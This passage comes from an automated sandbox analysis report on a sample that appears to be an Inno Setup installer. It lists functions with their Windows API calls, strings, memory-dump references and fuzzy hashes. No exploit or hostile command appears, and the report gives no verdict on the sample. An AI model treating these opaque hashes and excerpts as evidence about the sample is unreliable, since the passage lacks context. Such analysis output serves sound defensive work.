                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$EnableItem$System
                                                                                • String ID:
                                                                                • API String ID: 3985193851-0
                                                                                • Opcode ID: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                                                • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                                • Opcode Fuzzy Hash: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                                                • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                                Function 004812DC Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(10000000), ref: 00481499
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004814AD
                                                                                • SendNotifyMessageA.USER32(000203BE,00000496,00002710,00000000), ref: 0048151F
                                                                                Strings
                                                                                • Not restarting Windows because Setup is being run from the debugger., xrefs: 004814CE
                                                                                • Restarting Windows., xrefs: 004814FA
                                                                                • DeinitializeSetup, xrefs: 00481395
                                                                                • Deinitializing Setup., xrefs: 004812FA
                                                                                • GetCustomSetupExitCode, xrefs: 00481339
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary$MessageNotifySend
                                                                                • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                • API String ID: 3817813901-1884538726
                                                                                • Opcode ID: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                                                • Instruction ID: fb8259b883485ef9100c7f5c1e95e74d54582b152ce66d5af1bc00326fba4159
                                                                                • Opcode Fuzzy Hash: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                                                • Instruction Fuzzy Hash: 4451A034704240AFD711EB69D895B2E7BE9FB59704F50887BE801C72B1DB38A846CB5D
                                                                                Function 004619F8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SHGetMalloc.SHELL32(?), ref: 00461A33
                                                                                • GetActiveWindow.USER32 ref: 00461A97
                                                                                • CoInitialize.OLE32(00000000), ref: 00461AAB
                                                                                • SHBrowseForFolder.SHELL32(?), ref: 00461AC2
                                                                                • CoUninitialize.OLE32(00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AD7
                                                                                • SetActiveWindow.USER32(?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AED
                                                                                • SetActiveWindow.USER32(?,?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AF6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                • String ID: A
                                                                                • API String ID: 2684663990-3554254475
                                                                                • Opcode ID: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                                                • Instruction ID: 1302daae15839a874164301860301a8b98b45f7dd6f96d3c0913b4bd506695dd
                                                                                • Opcode Fuzzy Hash: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                                                • Instruction Fuzzy Hash: 64314FB0E00248AFDB00EFE6D885A9EBBF8EB09304F51447AF404E7251E7785A44CF59
                                                                                Function 00472C68 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85,?,?,00000000,004731F4), ref: 00472C8C
                                                                                  • Part of subcall function 0042CDA4: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE1A
                                                                                  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85), ref: 00472D03
                                                                                • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000), ref: 00472D09
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                • API String ID: 884541143-1710247218
                                                                                • Opcode ID: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                                                • Instruction ID: a2498b92200520dbea2b626460b71344a260e4c3afc9e0684e621ff8b49742b9
                                                                                • Opcode Fuzzy Hash: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                                                • Instruction Fuzzy Hash: 731122303005087BD721EA66DD82B9E73ACCB88714F60853BB404B72D1CB7CEE02865C
                                                                                Function 0045D618 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D621
                                                                                • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D631
                                                                                • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D641
                                                                                • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D651
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                • API String ID: 190572456-3516654456
                                                                                • Opcode ID: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                                                • Instruction ID: 6d5035e3426567f523c7c0f539c0fc89aa7e9857b83a97dd2a4ec5b9764e3533
                                                                                • Opcode Fuzzy Hash: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                                                • Instruction Fuzzy Hash: 0D01ECB0900740DEEB24DFB6ACC572236A5ABA470AF14C13B980DD62A2D779044ADF2C
                                                                                Function 0041A8EC Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                • 73EA4D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                                • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Color$StretchText
                                                                                • String ID:
                                                                                • API String ID: 2984075790-0
                                                                                • Opcode ID: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                                • Instruction ID: 0e7efefeb240adcf91359f1fba61dc18d1efd34d50a4dd97ee32c9a960060edb
                                                                                • Opcode Fuzzy Hash: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                                • Instruction Fuzzy Hash: 9861C5B5A00105EFCB40EFADD985E9AB7F8AF08314B10856AF918DB261C735ED41CF68
                                                                                Function 00457F00 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004580B4,?, /s ",?,regsvr32.exe",?,004580B4), ref: 00458026
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDirectoryHandleSystem
                                                                                • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                • API String ID: 2051275411-1862435767
                                                                                • Opcode ID: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                                                • Instruction ID: 809e342f07c36c5fe80e3456e65159aecd70c9e1b429d99a18f855550af0e9f5
                                                                                • Opcode Fuzzy Hash: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                                                • Instruction Fuzzy Hash: 97411570A043086BDB10EFD5D842B8EF7B9AB49705F51407FA904BB292DF789A0D8B19
                                                                                Function 0044D188 Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1B9
                                                                                • GetSysColor.USER32(00000014), ref: 0044D1C0
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0044D1D8
                                                                                • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D201
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D20B
                                                                                • GetSysColor.USER32(00000010), ref: 0044D212
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0044D22A
                                                                                • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D253
                                                                                • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D27E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Text$Color$Draw$OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 1005981011-0
                                                                                • Opcode ID: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                                                • Instruction ID: 3cb6cff9cb4fe1f97db5fca9cf7ecf77bacdc285bba155e9e6a5fbb2dce94e66
                                                                                • Opcode Fuzzy Hash: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                                                • Instruction Fuzzy Hash: 4921CFB42015007FC710FB6ACD8AE8B7BDCDF19319B01857AB918EB393C678DD408669
                                                                                Function 0041B67C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFocus.USER32 ref: 0041B755
                                                                                • 73E9A570.USER32(?), ref: 0041B761
                                                                                • 73E98830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                                • 73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                                • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                                • 73E98830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: E98830$A570A6310E922Focus
                                                                                • String ID: k H
                                                                                • API String ID: 184897721-1447039187
                                                                                • Opcode ID: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                                                • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                                • Opcode Fuzzy Hash: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                                                • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                                Function 0041B94C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFocus.USER32 ref: 0041BA27
                                                                                • 73E9A570.USER32(?), ref: 0041BA33
                                                                                • 73E98830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                                • 73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                                • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                                • 73E98830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: E98830$A570A6310E922Focus
                                                                                • String ID: k H
                                                                                • API String ID: 184897721-1447039187
                                                                                • Opcode ID: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                                • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                                • Opcode Fuzzy Hash: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                                • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                                Function 00495EC4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495F55
                                                                                • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495F69
                                                                                • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495F83
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F8F
                                                                                • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F95
                                                                                • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495FA8
                                                                                Strings
                                                                                • Deleting Uninstall data files., xrefs: 00495ECB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                • String ID: Deleting Uninstall data files.
                                                                                • API String ID: 1570157960-2568741658
                                                                                • Opcode ID: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                                • Instruction ID: fec72cc46ef3efd5c3c8e8a450f489c3c08d507a48e2b84f6ee45df75d5b7e94
                                                                                • Opcode Fuzzy Hash: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                                • Instruction Fuzzy Hash: 34219571304610AFEB11EB75ECC2B2637A8EB54338F61053BF504DA1E6D678AC008B1D
                                                                                Function 004704A4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1,?,?,?,?,00000000), ref: 0047050B
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1), ref: 00470522
                                                                                • AddFontResourceA.GDI32(00000000), ref: 0047053F
                                                                                • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00470553
                                                                                Strings
                                                                                • Failed to open Fonts registry key., xrefs: 00470529
                                                                                • Failed to set value in Fonts registry key., xrefs: 00470514
                                                                                • AddFontResource, xrefs: 0047055D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                • API String ID: 955540645-649663873
                                                                                • Opcode ID: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                                                • Instruction ID: 66ce3b01f7eb708e2302e7809b1ea03697ff66c32de1c99646f3643d23023453
                                                                                • Opcode Fuzzy Hash: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                                                • Instruction Fuzzy Hash: 62216570741204BBDB10EA669C42FAE779D9B55708F50843BB904EB3C2D67CDE028A5D
                                                                                Function 0046319C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                  • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                  • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                                • GetVersion.KERNEL32 ref: 004631CC
                                                                                • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0046320A
                                                                                • SHGetFileInfo.SHELL32(004632A8,00000000,?,00000160,00004011), ref: 00463227
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 00463245
                                                                                • SetCursor.USER32(00000000,00000000,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046324B
                                                                                • SetCursor.USER32(?,0046328B,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046327E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                • String ID: Explorer
                                                                                • API String ID: 2594429197-512347832
                                                                                • Opcode ID: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                                • Instruction ID: b0d998c5e58c3251a46d3edbb0a2afbc6be3b3781793d4cbec8386629f90fe5f
                                                                                • Opcode Fuzzy Hash: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                                • Instruction Fuzzy Hash: FA21E7307403446AEB10FF795C57F9A7698DB09709F5040BFF605EA1C3EA7C8908866D
                                                                                Function 0047828C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66libraryfileloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02152BE0,?,?,?,02152BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
